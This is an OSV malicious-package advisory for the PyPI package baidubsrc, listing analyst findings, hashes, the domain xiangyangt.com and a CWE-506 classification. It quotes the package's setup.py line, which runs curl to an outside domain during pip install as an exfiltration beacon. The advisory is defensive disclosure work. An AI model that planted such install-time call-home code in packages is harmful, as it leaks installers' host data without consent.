MAL-2026-4809
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/baidubsrc/MAL-2026-4809.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4809
- Published
- 2026-05-26T13:07:47Z
- Modified
- 2026-05-26T23:00:55.112674955Z
- Summary
- Malicious code in baidubsrc (PyPI)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)
setup.py executes
os.system("curl xiangyangt.com/pypi")unconditionally duringpip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)
During installation, package calls home, and there is no other functionality.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
- Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-26T13:32:46.899109904Z", "versions": [ "0.0.1" ], "modified_time": "2026-05-26T13:08:42Z", "sha256": "601a0198fee420c15f127c695a251ac5fb2433357e0a24f146bc8c3cac8a5c77", "id": "IN-MAL-2026-004909", "source": "amazon-inspector" }, { "import_time": "2026-05-26T13:32:46.837330409Z", "source": "amazon-inspector", "modified_time": "2026-05-26T13:07:47Z", "id": "IN-MAL-2026-004908", "sha256": "e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd", "versions": [ "0.0.1" ] }, { "import_time": "2026-05-26T22:55:25.019349347Z", "source": "kam193", "modified_time": "2026-05-26T22:06:08.515385Z", "sha256": "70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc", "id": "pypi/GENERIC-standard-pypi-install-pentest/baidubsrc", "versions": [ "0.0.1" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- Kamil MaĆkowski (kam193) - ANALYST
-
Affected packages
PyPI / baidubsrc
Package
- Name
- baidubsrc
- View open source insights on deps.dev
- Purl
- pkg:pypi/baidubsrc
Database specific
indicators
{
"package_integrity": [
{
"filename": "baidubsrc-0.0.1-py3-none-any.whl",
"hashes": {
"blake2b_256": "b960331bddc93619bb76c0e44ac7c37b57845a07de824b1590ceb0758113cbb1",
"sha256": "985ada2bb71018594b9b1b944dd6f9f326ef0914c08804d7a39abe8e7bc0a39d",
"md5": "d87c9c373207730322ddd06b3ab633a1"
}
},
{
"filename": "baidubsrc-0.0.1.tar.gz",
"hashes": {
"blake2b_256": "e64910c19329175a3183b844480d2fb212ddd844be8c4940e0667d71ba8baa67",
"sha256": "2cdd3074e5efed03318366f2567cd7a4ffc391e8ae01fa4eab4ef153ea5b7280",
"md5": "0075be1d16a6c98c8d67bb089a687286"
}
}
],
"domains": [
"xiangyangt.com"
],
"evidence_files": [
{
"path": "setup.py",
"sha256": "72c8d64ee57380a52dbe0f588800c3a93010e96b8ca880e47be5e355def45fa9",
"tlsh": "e1d02ea14e4222a994c0ac1a2d95380202286d633e20e1c8b3c64b242b491ebab7b679"
}
]
}
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/baidubsrc/MAL-2026-4809.json"